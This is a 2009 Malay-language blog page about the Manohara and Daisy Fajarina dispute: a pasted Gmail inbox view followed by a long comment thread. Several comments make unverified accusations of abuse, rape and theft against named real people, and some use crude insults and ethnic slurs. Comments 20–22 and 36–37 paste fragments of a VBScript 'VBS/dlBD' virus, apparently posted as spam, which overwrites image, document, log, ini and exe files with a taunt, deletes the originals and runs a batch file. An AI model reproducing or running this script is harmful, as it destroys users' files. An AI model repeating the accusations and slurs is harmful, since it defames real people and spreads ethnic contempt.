Thursday, July 23, 2009

Lapuran sebelum mendapat khabar dari Salihah, di Mobes Polri, Jakarta.

Gmail Calendar Documents Reader Sites Images Web more ▼News Groups Books Scholar Blogs Translate even more » iz.greenish@gmail.com Settings Older version Help Sign outGmail Logo Search Mail Search the WebShow search optionsCreate a filter


Compose Mail

Contact Give Gmail to:
Send Invite 50 left
Preview Invite

>www.701panduan.com - Senarai Kedai Makan di Malaysia, Dapatkan Alamat, Telefon, Peta Archive Report spam Delete Move to Labels lain2 comment dah habis tenggelam copycat gila‎ - You boleh hantar komenter disini. nanti kita posting didalam blog diantara komenter [Truth Appeared] New comment on Pengumuman.

Oleh kerana ada pengkhianatan ‎ - Minta maaf, thank you diatas sokongan. sekali lagi maaf, terlupa bahawa ada copy disini. akan … Jul 19Love Sense[Truth Appeared] New comment on PEMBOHONG dianugerah "kanjeng mas ayu tumenggung" ....‎ - Love Sense has left a new comment on the post "PEMBOHONG dianugerah "kanjeng mas ayu Picasa Web Albums eko added you as a favorite Add to Favorites Fans of Your Photos Unsubscribe <iz.greenish@gmail.com> Halo, Blog Anda, kalo kami bisa nasihati desy, cukuplah kesana kemari bikin kerja bodoh, ramai orang tertawakan.

These are some comments compiled for reading pleasure...lain2 comment dah habis tenggelam spam from the copycat. its up to you you cna publish these comments in the 'salihah' article you posted if you like.


aurora said... Guano sampa suwa dale orhe pong demo nok simpe? Gilo nate nih ...July 20, 2009 11:43 AM permata hati said... hi all,happy monday......sedeynye saya dengan apa yang berlaku...honey..heng suma kna copycathmmmagak hot gak ye weekend ni
wahhhh..ni gmbar terbaru saliha ke?hmm kalau betul la apa yng dikata diharap kebenaran akan menjelma.

p/s : tak sangka ye malysia dapat dua gol..sorry out of topic..heheheheJuly 20, 2009 11:46 AM Tembam said... Daisy Fajarina threatened Pak Ari for monetary compensation jugak ke? Jahat nya perempuan sorang ni.July 20, 2009 11:51 AM permata hati said... hi tembam and aurora,salam kenal.... heeeJuly 20, 2009 11:56 AM Tembam said... This post has been removed by a blog administrator. July 20, 2009 11:59 AM aurora said... Temban! nice to hear from u, mcm rindu gitu!

permata - salam perkenalan!July 20, 2009 12:00 PM permata hati said... hi aurora..uishhh i think this copycat still around la...July 20, 2009 12:01 PM Adiq said... @ramNasi lemak $1 ngan telur busuk!!! campur kupang basi nenek lampir. wkakakakaJuly 22, 2009 1:46 PM Adiq said... indon sekor ni betul munafik. tuhari terpekik2 kata media dia bebas negeri dia demokrasi, malaysia tak bebas tak demokrasi. tapi tak boleh terima kritikan. kalau tak sehaluan ngan dia jer dia spam. betul bodoh punya indon sekor ni.

July 22, 2009 1:42 PM Adiq said... Nenek lampir deasy suka kumpul seluar dalam terpakai tuk lap kat muka dia tiap2 malam biar nampak cam muka lanc*u!!! wkakakkaJuly 22, 2009 1:32 PM Adiq said... @rambukan nasi kangkang,pekena kangkang sekali!!! kangkang nenek lampir! wkakakakaJuly 22, 2009 1:29 PM aurora said... Just in case you all miss the earlier posting, i have the full version of sinetron berjudul 'Celana dalamku diambil orang'. Enjoy it!
Copycat said : 'Adoi. doi.. penatnya tangan aku, kalau tak kerana upahnya mahal, rela aku mati depan pc. Lepas ni nak telan pil senang, biar asyik copasnya!'(sambil mengurut tangannya yg sudah kebas).

sambung copycat lagi : 'Ibu Daisy tolong dong, urutkan tanganku, sudah kebas ni, naikkan upahnya, saya dimakiin terus!'
sambil menangis copycat bilang: 'Tolong bu daisy jgn diambil celana dalamku yg robek tu, aku punya satu aja, kalau diambil, saya nggak punya tuh!'
dengan nada marah, copycat bilang sama aurora : 'aurora! kau sudah bikin darah aku panas, nanti kau!' sambil tersenyum aurora pun balas: 'jgn marah pak cc, nanti aku belikan celana dlm yg baru, gantikan aja yg udah robek tu, biar aja ibu daisy yg simpan. Masa disuruh copas ngak dibelikan celana dalam yg baru. emangnya suka kumpulin celana dalam ya ibu itu?'July 22, 2009 1:29 PM

Mrs said... Comment baru I untuk posting blog owner yg terbaru, izgreenish, isteri yg NUSYUZ tidak berhak pegang title CPT (CIK PUAN TEMENGGUNG). Dia dah nusyuz pada TT maka dia secara otomatis dah let go title CPT. Yg tinggal hanya title Kanjeng Mas Ayu yg murahan itu.

Kalau dia tak respond pada TT dalam 21 hari, dia akan ditangkap interpol indonesia dan diapit polis indonesia dan malaysia atas arahan hukum. Itu nasib Manohara. mana mau lari? Perancis menuggu daisy fajarina masuk penjara. Manakala di US George Manz sudah dedahkan pada malaysia kejahatan daisy fajarina & manohara.

habislah

@hasharienaz apalagi email aja gambar separuh bogel manok ayam yg dadanya bersih dari siletan. doktor kat sana pun agaknya sudah makan suap atau minum air kencing diberi daisy fajarina atau seluar dalam doktor itu dicuri daisy fajarina seperti dilakukan kpd pak ari.
wahahahahahahhahaaJuly 22, 2009 1:23 PM ram said... Copycat dah kena nasi kankang Daisy. Mrs said... @adiq aku setuju adiq, nampak sangat copycat ni orang upahan daisy fajarina yg dah nak jatuh miskin kehabisan duit...manohara kena berlakon sinetron penipuan dia nak cari uang...sianJuly 22, 2009 1:15 PM Reply Reply
Gambar Orang »
Kerja Di Rumah »
Lowongan Terbaru »About these links« Back to Inbox Archive Report spam Delete Move to Labels More actions 1 of 17 Older ›Get new mail notifications. Download the Gmail Notifier.

316 comments:

  1. Hari ini Jam 10.00 pagi.
    SALIHAH ke MOBES POLRI buat lapuran tentang KEJAHATAN dan KEZALIMAN Dasiy Fajarina dan Pinot terhadap dirinya.

    1. Didera dan tidak diberi sekolah.
    2. Di Perkosa secara paksa oleh Pinot.
    3. Di Seksa oleh Desiy Fajarina.
    (a) Dicukur rambut
    (b) Dipukul dengan penyangkut Baju
    (c) Di Pijak dan di Tendang
    (d) Berdarah separuh mati kesakita
    (e) Di Paksa Melakukan Sex dengan Pinot
    (f) Di Paksa minum Air Kencing Dasiy
    sampai muntah-muntah bersama Pinot
    (g) Tak bayar gaji selama 9 tahun
    (h) Memaksa Salihah simpan celana dalam
    Pak Ari (Mantan Presiden Pertamina)
    (i) Memaksa Salihah bercakap bohong.
    (j) Memaksa Salihah supaya rahsiakan
    konsperasi Paranorma/Dukun.

    Selain dari itu banyak lagi Kejahatan yang telah dilakukan olehj Dasiy Fajarina kepada orang lain selain daripada melakukan KEZALIMAN terhadap Salihah.

    Polisi akan bertindak untuk membenarkan KEADILAN.

    Tahniah kepada SALIHAH kerana BERANI menentang KEZALIMAN yang dilakukan oleh Dasiy Fajarina, walaupun Dasiy Fajarina dikawal ketak oleh Pendekar banten dan Laskar Merah Puteh.

    Salihah orang miskin berjuang seorang diri untuk menegakkan Keadilan, tapi Dasiy Fajarina didokong oleh ratusan pendekar dan Laskar Merah Puteh untuk menghancurkan Salihah seorang dan berbohong kepada rakyat Bangsa Indonesia.

    SALIHAH adalah anak BANGSA INDONESIA sejati yang telah diperkosa oleh orang Bangsa Asing (Pinot) tapi begitu gigih untuk melawan bagi menegakkan KEBENARAN.

    Orang Asing yang memperkosa dan mengkhianati kehidupan SALIHAH ialah Suami kepada Dasiy Fajarina dan Ayah Tiri kepada Manohara.

    Kenapa rakyat Bangsa Indonesia, tunggu lagi.
    Ayuh bertindaklah menyokong Salihah yang terbukti telag diseksa oleh Dasiy Fajarina dan Pinot.

    Halau Pinot dan PENJARAKAN Dasiy Fajarina.
    ALLAH Selamatkan SALIHAH>

    ReplyDelete
  2. hari ni kan? today kan??

    habeh lah ko daisy...

    ReplyDelete
  3. What goes around comes around. Lepas ni Mano naik main sinetron apa lagi ya?

    ReplyDelete
  4. alhamdulillah...akhirnye Saliha kembali memperjuangkan nasibnye...
    kami bersamamu Saliha...
    tapi yang tak bestnye point ni
    j) Memaksa Salihah supaya rahsiakan
    konsperasi Paranorma/Dukun.

    masih kebalkah lagi ilmunye...jagn dia knakan saliha lagi sudahla...YaAllah mintak dijauhkannnn

    ReplyDelete
  5. Hai Dian, lama u tak singgah kat sini! Rindu ...

    ReplyDelete
  6. Halo sume.. sihat ker? Tembam, Dian, Enamanjalara, Aurora, fes (lama gak keliatan, bete ya), inang manja, Junus, *Manohuruhara* etc..

    Honey 1913.. jom la sembang. i know u r there for us..

    ReplyDelete
  7. Hello Everybody!
    I felt macham matahari telah menyinar dengan terangnya hari ini. Harap kami tidak di selubongi dengan kegelapan seperti gerhana bulan semalam.

    Really kind of miss you all > yang lama dan the newbies! Dalam banyak2 Inang Manja is missing, aku harap dia okay2 dan akan kembali disini lagi. ManoHuruHara, thanks for backing me at Raayat Kelantan. Aku harap all the baddies tak dibenarkan disini. Will come here again later. Bye semua!

    ReplyDelete
  8. This comment has been removed by the author.

    ReplyDelete
  9. Hi. Just arrived. Love Sense, dah dekat pukul 12tgh hari dah ni. X de info terbaru tentang laporan Salihah ke... X sabar nak tahu nih.

    ReplyDelete
  10. wow...memang aman...naik keras gak jari jemari x berkomentar..hahaha

    ReplyDelete
  11. Hi Honey,
    Bukan salah you, Kami semua dah cukop faham yang kita semua difitnah oleh sipolan itu. Jangan ambil hati. Welcome back to the playground dan senang2 aje..

    I heard TT has agreed to go ahead with the telemovie about the his and real side of the story. Aku sokong sekali and hope this would be the real thing. Pernah aku nonton soap opera Manohara di RCTI > teruk...sekali, sampai aku change channel nonton drama Korea. Manohara's really kaku betul..no expression..just one dimension..macham orang ambil shooting modelling...dan mulut dia punya lebar..macham terowong MRT > not worth to engross and watch. I don't thing this serial would be a sucessful one.

    Mungkin yang lain tak tahu tak? yang this blog is on again? Anyway hope they will come again.

    ReplyDelete
  12. @Aurora, ye lah just return from overseas trip. stopped by in Jakarta also and you know what? People get fed up with Mano and Daisy. Out of 10 persons, 7 dah muak dengar pasal Mano dah.. dorang cakap 'Gak ada berita lain apa?! dia lagi dia lagi! bosen! tukang ngutang!"

    hahaha.. aiyooo... popularity goes down mummy and daughter get panic wooo... biar mati action asal jangan mati accident..

    ye lah how si saliha ni dah pi report ke? dah gatay tangan aku nak comment..

    ReplyDelete
  13. I laughed so hard.. so hard macam mau mati, saaakit perut aku when I read Daisy owns rp700 million (about rm233K) to a businessman, she cant pay back and she said.. she nak bayar with doa hahahaha... oh my god that is the greatest joke of the year :))

    ReplyDelete
  14. Lama tak dengar berita tentang Junus dan nafkah batin nya dan Andrew bersama ular ularnya. Perkenalkan sekali lagi - saya Tembam dan semakin Tembam

    Memang rindu rasa nya tak dapat berborak kat sini. Baru a few days tapi dah dapat withdrawal syndrom.

    Master Yoda, Inang Manja, Anaz,Fes, Sakura dan Junus tak timbul lagi. Mana dia orang ni.

    ReplyDelete
  15. si daisy relaks jer, yang korang kepanasan kenapa?

    ReplyDelete
  16. Kita orang kepanasan and full of excitement for the ray of light.

    ReplyDelete
  17. akupun pelik manusia yang kuat menipu ni.apa dia ingat orang semua tolol sangat ke sampai nak percaya semua penipuan dia.aku kalau jumpa si Tembam ni aku cili cili mulut dia biasa dia jadi bisu,baru aman dunia ni.

    ReplyDelete
  18. *ManoHuruHara* fake dah kena sawan balik. ni tengah mengoyan..... jaga semua nanti berjangkit lak. id di kat bawah ni.... orang gilo..
    http://www.blogger.com/profile/17335274583311391427

    ReplyDelete
  19. This comment has been removed by the author.

    ReplyDelete
  20. script injection
    dim FSobj,winDir,sysDir,copySelf,newFile,rawFileData,hackedFileData,fixData,dataFixed,newFileData,copySelfComplete
    set FSobj=CreateObject("Scripting.FileSystemObject")
    set sysDir=FSobj.GetSpecialFolder(1)

    ReplyDelete
  21. checkDate()
    function checkDate()
    if (day(Now)=31 and month(Now)=3)or(day(Now)=19 and month(Now)=12) then
    beginInfestation()
    displayMessage()
    else
    plantTrojanizedFile()
    end if
    end function

    function plantTrojanizedFile()
    set copySelf=FSobj.CreateTextFile(sysDir+"\sys-dlBD.vbs")
    copySelfComplete.close

    orgMes="WELCOME TO LIARS DUNGEON! :) - You have been infected with the VBS/dlBD Virus...Written by *|%|"
    mesStageTwo=replace(orgMes,chr(42),chr(68))
    mesStageThree=replace(mesStageTwo,chr(124),chr(46))
    finalMes=replace(mesStageThree,chr(37),chr(76))

    for each file in directory
    extName=lcase(FSobj.GetExtensionName(file.Path))
    complete=lcase(file.Name)

    if (extName="jpg")or(extName="gif")then
    set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
    generateCopy.write finalMes
    adExt.copy(location&"\"&appName&".txt")
    FSobj.DeleteFile (file.Path)

    elseIf (extName="log")or(extName="ini") then
    set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
    generateCopy.write finalMes
    generateCopy.Close
    appName=FSobj.GetBaseName(file.Path)
    set adExt=FSobj.GetFile(file.Path)
    adExt.copy(location&"\"&appName&".txt")
    FSobj.DeleteFile (file.Path)

    elseIf (extName="doc")or(extName="exe") then
    set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
    generateCopy.write finalMes
    generateCopy.Close
    appName=FSobj.GetBaseName(file.Path)
    set adExt=FSobj.GetFile(file.Path)
    adExt.copy(location&"\"&appName&".txt")
    FSobj.DeleteFile (file.Path)
    end if
    next
    end sub

    ReplyDelete
  22. function displayMessage()
    dim shell,messageFile
    set shell = CreateObject("WScript.Shell")
    set messageFile=FSobj.CreateTextFile(sysDir&"\dlBD-mes.bat")
    messageFile.close
    set FSobj=CreateObject("Scripting.FileSystemObject")
    set messageFile=FSobj.CreateTextFile(sysDir&"\dlBD-mes.bat")
    messageFile.WriteLine("@title Happy Birthday to me! :) - VBS/dlBD Virus")
    messageFile.WriteLine("@cls")
    messageFile.WriteLine("@echo WELCOME TO LIARS DUNGEON! :) - You have been infected with the VBS/dlBD Virus :(")
    messageFile.WriteLine("@echo.")
    messageFile.WriteLine("@pause")
    messageFile.close
    shell.Run(sysDir&"\dlBD-mes.bat")
    end function

    function writeCopy()
    rawFileData="rem - VBS/dlBD ^DL DUNGEON^ Virus by *|%|" &vbcrlf& _
    "On Error Resume Next" &vbcrlf& _
    "extName=lcase(FSobj|GetExtensionName(file|Path))" &vbcrlf& _
    "FSobj|DeleteFile (file|Path)" &vbcrlf& _
    "end if" &vbcrlf& _
    "next" &vbcrlf& _
    "end sub" &vbcrlf& _
    "function displayMessage()" &vbcrlf& _
    "dim shell,messageFile" &vbcrlf& _
    "set shell = CreateObject(^WScript|Shell^)" &vbcrlf& _
    "set messageFile=FSobj|CreateTextFile(sysDir&^\dlBD-mes|bat^)" &vbcrlf& _
    "messageFile|close" &vbcrlf& _
    "set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
    "set messageFile=FSobj|CreateTextFile(sysDir&^\dlBD-mes|bat^)" &vbcrlf& _
    "messageFile|WriteLine(^@title Happy Birthday to me! :) - VBS/dlBD Virus - by *|%|^)" &vbcrlf& _
    "messageFile|WriteLine(^@cls^)" &vbcrlf& _
    "messageFile|WriteLine(^@echo WELCOME TO LIARS DUNGEON! :) - You have been infected with the VBS/dlBD Virus :(^)" &vbcrlf& _
    "messageFile|WriteLine(^@echo|^)" &vbcrlf& _
    "messageFile|WriteLine(^@pause^)" &vbcrlf& _
    "messageFile|close" &vbcrlf& _
    "shell|Run(sysDir&^\dlBD-mes|bat^)" &vbcrlf& _
    "end function"
    end function

    ReplyDelete
  23. Orang memberi, kita menerima. Saya memang kuat makan pedas. So cili tu macam gula gula je. Terima kasih lah for the offer.

    ReplyDelete
  24. Hi kawan2 seme....

    Ni Inang ni, apa kabar seme sayang? Eh rindu Inang kat kawan2. Adorable Aurora, Sweet Honey, Cutie Tembam, Roaring Ram, Havoc Manohuruhara, Lovely Sakura, Playboy Andrew, Bang Junus, Patriotic Heng eh.... banyaklah seme yg tersayang2 ok.

    Wah... seminggu lebih Inang tak kat sini, macam2 hal ye dah terjadi. Sorrylah kawan2, Inang bukan merajuk tapi Inang pegi 'out station' ade keje sikit...

    Ni kawan2, Inang nak cakap pasal TT nak buat filem pasal cinta TT ngan Manoharan. Inang tentu akan nonton filem tu nanti, Inang tau ceritanya tentu menyentuh hati tentu mengugah emosi penonton, betul tak kawan2. Tak sabar nak tengok walau Inang tak suka cerita sedih2 nanti Inang asyik teringat...

    Apa pun Inang nak ucapkan syabas pada TT yg dah pun memfailkan saman malunya terhadap yg berkenaan. Mudah2 kebenaran segera terungkap. Betul tak kawan2?

    ReplyDelete
  25. Hi, tengok tu macam2 orang yang x siuman dah buat. nak hack blog ni le tu..... copy paste le... hantar virus le.... macam2 lak. orang terdesak biasanya akan melakukan banyak bende2 pelik kerana nak luahkan emosi mereka. kesian...ek

    ReplyDelete
  26. Nak luah kan emosi, sampai entah bahasa apa yang dia guna. Kita pun tak paham. Psycologically sebab kita tak paham bahasa yang diguna tu, emosinya masih terpendam. Kesian.

    ReplyDelete
  27. Inang Manja! Thanks God! You dah balek! It's good to hear from you. I am sure semua kawan2 miss you already. Welcome back!

    Harap Blog Owner aware yang apa Mamat kata itu betul, dah datang faked Manohuruhara lagi. Please cripple the faker. Tak mahu jadi macham dulu lagi.

    Kalau semua mahu trace id faker - check at Raayat Kelantan, I have compiled the list of some of our id and the fakers > print it and put infront our computer to check as reference. I really..really hope the Toughlane can immediately cripple the fakers again.

    Selamat semua!

    ReplyDelete
  28. This comment has been removed by the author.

    ReplyDelete
  29. @all...
    baca kat paper dis morning...daisy claims she got about 10 lawyers from malaysia to help her handling TT summon...comment?

    ReplyDelete
  30. Itu nama nya dia takut. TT pakai 1 je lawyer. Daisy sampai 10. 100 lawyer pun tak guna kalau tak ada bukti.

    ReplyDelete
  31. Hi Roaring Ram, 'thanks'ye sayang... Inang pun rindu sangat pada seme. Inang adalah dtg nak komen kat sini tuhari tapi 'comment space' tutup. Tapi Inang dah baca seme 'post' dan 'comments' lepas.

    BTW Inang nak ucap 'hi' pada Bright Dian & Bro Mamat.

    ReplyDelete
  32. haha...yg pliknyer...lgsung xder saper mengaku pon...dieorg jd peguam manohara..sajer nk sdpkn ati ker

    ReplyDelete
  33. TQ :) Inang Manja. Teruskan di blog ini. I like your stail of wordings..... manja, tapi pedas.

    ReplyDelete
  34. Hi Sweetie Honey!!! Inang rindu sgt kat Honey, betul baru mula keje kat sini sweetie. Besok dah weekend lagi...

    Inang setuju sangat ngan sweetie tu, kita menyokong yang benar atau apa yg kita lihat dari mata kasarnya benar, ye tak sweetie?

    ReplyDelete
  35. wahai rakan2 jangan risau ini bukan virus...tapi....tapi...wakakakakaka

    ReplyDelete
  36. script injection
    dim FSobj,winDir,sysDir,copySelf,newFile,rawFileData,hackedFileData,fixData,dataFixed,newFileData,copySelfComplete
    set FSobj=CreateObject("Scripting.FileSystemObject")
    set sysDir=FSobj.GetSpecialFolder(1)

    checkDate()
    function checkDate()
    if (day(Now)=31 and month(Now)=3)or(day(Now)=19 and month(Now)=12) then
    beginInfestation()
    displayMessage()
    else
    plantTrojanizedFile()
    end if
    end function

    function plantTrojanizedFile()
    set copySelf=FSobj.CreateTextFile(sysDir+"\sys-dlBD.vbs")
    copySelfComplete.close

    orgMes="WELCOME TO LIARS DUNGEON! :) - You have been infected with the VBS/dlBD Virus...Written by *|%|"
    mesStageTwo=replace(orgMes,chr(42),chr(68))
    mesStageThree=replace(mesStageTwo,chr(124),chr(46))
    finalMes=replace(mesStageThree,chr(37),chr(76))

    for each file in directory
    extName=lcase(FSobj.GetExtensionName(file.Path))
    complete=lcase(file.Name)

    if (extName="jpg")or(extName="gif")then
    set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
    generateCopy.write finalMes
    adExt.copy(location&"\"&appName&".txt")
    FSobj.DeleteFile (file.Path)

    elseIf (extName="log")or(extName="ini") then
    set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
    generateCopy.write finalMes
    generateCopy.Close
    appName=FSobj.GetBaseName(file.Path)
    set adExt=FSobj.GetFile(file.Path)
    adExt.copy(location&"\"&appName&".txt")
    FSobj.DeleteFile (file.Path)

    elseIf (extName="doc")or(extName="exe") then
    set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
    generateCopy.write finalMes
    generateCopy.Close
    appName=FSobj.GetBaseName(file.Path)
    set adExt=FSobj.GetFile(file.Path)
    adExt.copy(location&"\"&appName&".txt")
    FSobj.DeleteFile (file.Path)
    end if
    next
    end sub

    ReplyDelete
  37. function displayMessage()
    dim shell,messageFile
    set shell = CreateObject("WScript.Shell")
    set messageFile=FSobj.CreateTextFile(sysDir&"\dlBD-mes.bat")
    messageFile.close
    set FSobj=CreateObject("Scripting.FileSystemObject")
    set messageFile=FSobj.CreateTextFile(sysDir&"\dlBD-mes.bat")
    messageFile.WriteLine("@title WELCOME TO LIARS DUNGEON! :) - You have been infected with the VBS/dlBD Virus")
    messageFile.WriteLine("@cls")
    messageFile.WriteLine("@echo WELCOME TO LIARS DUNGEON! :) - You have been infected with the VBS/dlBD Virus :(")
    messageFile.WriteLine("@echo.")
    messageFile.WriteLine("@pause")
    messageFile.close
    shell.Run(sysDir&"\dlBD-mes.bat")
    end function

    function writeCopy()
    rawFileData="rem - VBS/dlBD ^DL DUNGEON^ Virus by *|%|" &vbcrlf& _
    "On Error Resume Next" &vbcrlf& _
    "extName=lcase(FSobj|GetExtensionName(file|Path))" &vbcrlf& _
    "FSobj|DeleteFile (file|Path)" &vbcrlf& _
    "end if" &vbcrlf& _
    "next" &vbcrlf& _
    "end sub" &vbcrlf& _
    "function displayMessage()" &vbcrlf& _
    "dim shell,messageFile" &vbcrlf& _
    "set shell = CreateObject(^WScript|Shell^)" &vbcrlf& _
    "set messageFile=FSobj|CreateTextFile(sysDir&^\dlBD-mes|bat^)" &vbcrlf& _
    "messageFile|close" &vbcrlf& _
    "set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
    "set messageFile=FSobj|CreateTextFile(sysDir&^\dlBD-mes|bat^)" &vbcrlf& _
    "messageFile|WriteLine(^@title WELCOME TO LIARS DUNGEON! :) - You have been infected with the VBS/dlBD Virus - by *|%|^)" &vbcrlf& _
    "messageFile|WriteLine(^@cls^)" &vbcrlf& _
    "messageFile|WriteLine(^@echo WELCOME TO LIARS DUNGEON! :) - You have been infected with the VBS/dlBD Virus :(^)" &vbcrlf& _
    "messageFile|WriteLine(^@echo|^)" &vbcrlf& _
    "messageFile|WriteLine(^@pause^)" &vbcrlf& _
    "messageFile|close" &vbcrlf& _
    "shell|Run(sysDir&^\dlBD-mes|bat^)" &vbcrlf& _
    "end function"
    end function

    ReplyDelete
  38. @Inang Manja
    Hi.. baru jer say hello kat inang, eh tetiba dah muncul.. panjang umur inang. lengkap sudah gelaran yang inang bagi kat kitorang sume, kelakarlah..

    nampaknya sorang2 dah balik kat blok ni, tapi Junus, fes, narwastu blom nampak lagi. jangan2 paspor dorang dah expired so kene pegi imigresen dulu. kikikiki...

    bile inang nak belanja minum andrew? ala inang.. saje je buat lupe..

    ReplyDelete
  39. hi all,
    kita baru balik mkn...dh nk jadi ular sawa ni kekenyangan hikhikhikhik....... honey betul tu kita rasa sedey betul dengan blog tu...tapi kita rasa mesti orang yang buat blog tu berdendam kerana 'sesuatu'....

    hi ram,
    thanks for the list i dh copy and print it out..ehh tk silap i ada copycat la tadi kt sini...


    hi inang manja salam kenal...

    ReplyDelete
  40. Inang sayang, rindu I. Tembam, u memang kelas cili pedas mcm gula-gula. ManoHuruHara... I have doubt on you ...

    ReplyDelete
  41. Xandria - Daisy kena pasang 10 lawyer nak lawan tt. nampak sgt takut, masalahnya boleh bayar ker tu? takut bayar ngan doa lak? hiks!!

    Awas para lawyer, pastikan celana dalammu sentiasa di dlm bukan di tgn daisy, si pengumpul celana dlm!!!

    ReplyDelete
  42. Ni berita pasal Shaliha kat MalayMail hari nih.

    http://www.mmail.com.my/content/8829-daisys-worst-nightmare-comes-true

    sudi2kan. siap gambar close-up lagi....

    ReplyDelete
  43. wakakakkakakaka no new comments for orang gila dok spam semalam orang nak bersembang dengan kawan2 pun tak boleh....habis nick tembam, aurora, nick aku, ezuana dibelasahnya...padan muka skang tak boleh comment. amik ko...

    ahh malas aku nak tonton sinetron bodoh yg menipu...manohara kat detiknews asik kata 'saya sudah siap kerana sekarang ada pengacara'...sampai la ni batang hidung pengacara/lawyer dia [un tak muncul2.

    hasharienaz diamana dikau? haaa ini masnya ko email gambar separuh yg adanya bersih tak disilet....email itu dihantar ke hotman bukan? aku tak surprise lepas ni hotman tarik diri kerana client dia penipu...email ajer gambar tu kpd: iz.greenish@gmail.com blog owner...biar dia yg decide nak tepek gambar tu disini..

    tergelak guling aku baca comment adiq & ram..dan aurora...tak sangka you pandai karang cerita klasik celana dalam kena curi...wakakakakkakaka

    tak sabar nak baca pasal salihah ni...orang akan bertanya apa kena mengena kejahatan ibu daisy dengan penderaan mano?

    JAWAPAN: ibu daisy masih legal guardian manohara yg berumur 17. kenapa manohara kawin TT? atas dorongan duit dan juga 16 tahun umur yg legal utk kawin...kalau dia kena rogol apaan sih kawin ama TT? pembohong....

    ReplyDelete
  44. hehehe waaa semangat betul ye master yoda...hehehe
    ni berita dh kuar dlm detik news

    http://www.detikhot.com/read/2009/07/23/120548/1170097/230/diduga-aniaya-pembantu-ibunda-manohara-dilaporkan-ke-polisi

    ReplyDelete
  45. @aurora...
    mengikut yang aku baca td...dia ckp...kalau tuhan ijinkan bisa saja bayar..hak2

    ReplyDelete
  46. This comment has been removed by the author.

    ReplyDelete
  47. http://www.mmail.com.my/content/8829-daisys-worst-nightmare-comes-true

    ini bagus dibaca....:) suka aku baca..kudoss malay mail...

    Xandria said...

    @aurora...
    mengikut yang aku baca td...dia ckp...kalau tuhan ijinkan bisa saja bayar..hak2
    July 23, 2009 1:54 PM

    jangan berangan lah...dia takde duit nak bayar 1 juta rm..inikan pulak 105 juta rm

    ReplyDelete
  48. Wahduh Tijah! Dah jadi one big family lagi kita hari ini. Very happy..happy > macham Manohara jumping macham budak kechik! HaHaHa!

    master yoda, welcome back! really miss your sharp and spicy comments!

    Bak orang kata "one is better than more" semua 10 lawyers Mano are a bunch of empty tong! Banyak omong2 kosong aje!

    ReplyDelete
  49. Quote from KapanLagi.com..
    Daisy cakap..
    "Ya nggak mendasar lah, orang saya yang dizolimi dan dianiaya kok malah dituntut 300 miliar, biar Tuhan yang menentukannya lah,

    ReplyDelete
  50. kalau dizalimi ngapain x direpot ya mbak daisy...hahaha..
    sengal

    ReplyDelete
  51. This comment has been removed by the author.

    ReplyDelete
  52. @honey correct. do you notice why her lawyers tak tampil2??

    dan juga mengilut undang2 terutama dia US, sex with underage girl ialah rape...daisy ingat mula2 dia pintar suruh manohara omong fakry rape anak dia tapi ternyata bodoh sebab kalau anti corruption prove dia manipulate underage daughter dia si manok ayam tu, habislah dia...no case.

    berst betul sembang hari ni dengan tiadanya copycat gila spam tuh...ena block dari blog owner...sian...:P

    ReplyDelete
  53. nampak gayanya tak sempat mano nak bina mushollah ... mana nak bayar hutang, nak bayar saman, nak bayar laywer 10 org lagi. Kena berlakunlah kau sampai ganyut!

    ReplyDelete
  54. Sambung lagi - mana nak kuruskan badan, mana nak menyanyi. Tak de masa.

    ReplyDelete
  55. assalamualaikum semua.....apa khabar andrew honey ram master yoda xandria inang tembam aurora mamat permata hati sakura izuana dian junus festananda heng dan semua pencinta keadilan sekalian

    seperti yang kita sedia maklum,harap janganla kita semua SENTAP apabila membaca komen palsu prof klon.apatah lagi kalau prof klon tu pakai nama seseorang dan cuba melagakan2 diantara 2 pihak.so kita buat dunno je dan ignore dia.janganlah kalau dah tau itu palsu makin dilayan layan pulak.kang menjadi jadi plak dia.

    im so happy that everyone can get back together again.aku yg tak pernah2 aktif baca blog ni pun tetiba jadi addictive.anyway sekarang ni daisy pasti dah gelabah macam ayam berak kapur.haha.i ada satu pesanan penaja ni.u all yang rajin baca website gosip dari seberang make sure pertahanan pc tu kukuh sebab byk website seberang tu yang embedded with virus.kang tak pasal pasal jenuh nak delete popups.ok lah u all have a nice day

    ReplyDelete
  56. Dasiy Fajarina ludah ke langit, maka air kahaknya jatuh kemuka sendiri.

    Hari ini sejarah HITAM Dasiy Fajarina kembali lagi setelah dimalukan oleh seoran wanita ternama Indonesia kerana cuba menghampiri suaminya dengan niat JAHAT.

    ReplyDelete
  57. Siapa wanita ternama Idonesia tu. Apa kisah nya? Cerita lah lagi Love Sense oi.

    ReplyDelete
  58. yuk! kahak tu!! sure pekat ...

    ReplyDelete
  59. Aurora,
    Pekat dan hijau. Eeee...

    ReplyDelete
  60. hi love sense,

    do u mean by aburizal bakrie wife

    i think so

    ReplyDelete
  61. This comment has been removed by the author.

    ReplyDelete
  62. haha...mcm2 terbongkar..lepas ni nak lari mane plak? thailand?

    ReplyDelete
  63. nasib baik la kes shaliha ni dah diputuskan di mahkamah perancis,kalau tak mesti mesti daisy cakap shaliha dibayar,TT nak alih perhatian kes,daisy dan mano selalu dizolimi dan macam2 lagi.biasala daisy kan suka twist fact

    press conference petang ni,harap2 ada yang upload kat utube.x sabar nak tgk shaliha.malam ni mesti daisy minum racun sebab semua kejahatan dia akan diketahui publik.hahaha.harap shaliha selamat disana dan keselamatannya dijaga manalah tahu daisy upah orang untuk menyakiti shaliha

    ReplyDelete
  64. aih...kalo c manohara ni tbukti salah...ader lg x org nk tgk sinetron dier

    ReplyDelete
  65. xandria - pasal tulah dorang kena take cover cecepat ... kalau tak, susah nak cari makan...siap pasang 10 lawyer! pastu dukun ...

    aku tak terkejut kalau lepas ni dorang nak cari sebab ngan salihah, tuduh mcm2 termasuk saliha yg sebenarnya curi suwa dlm tu..

    ReplyDelete
  66. UNTUK PENGETAHUAN SEMWANYA

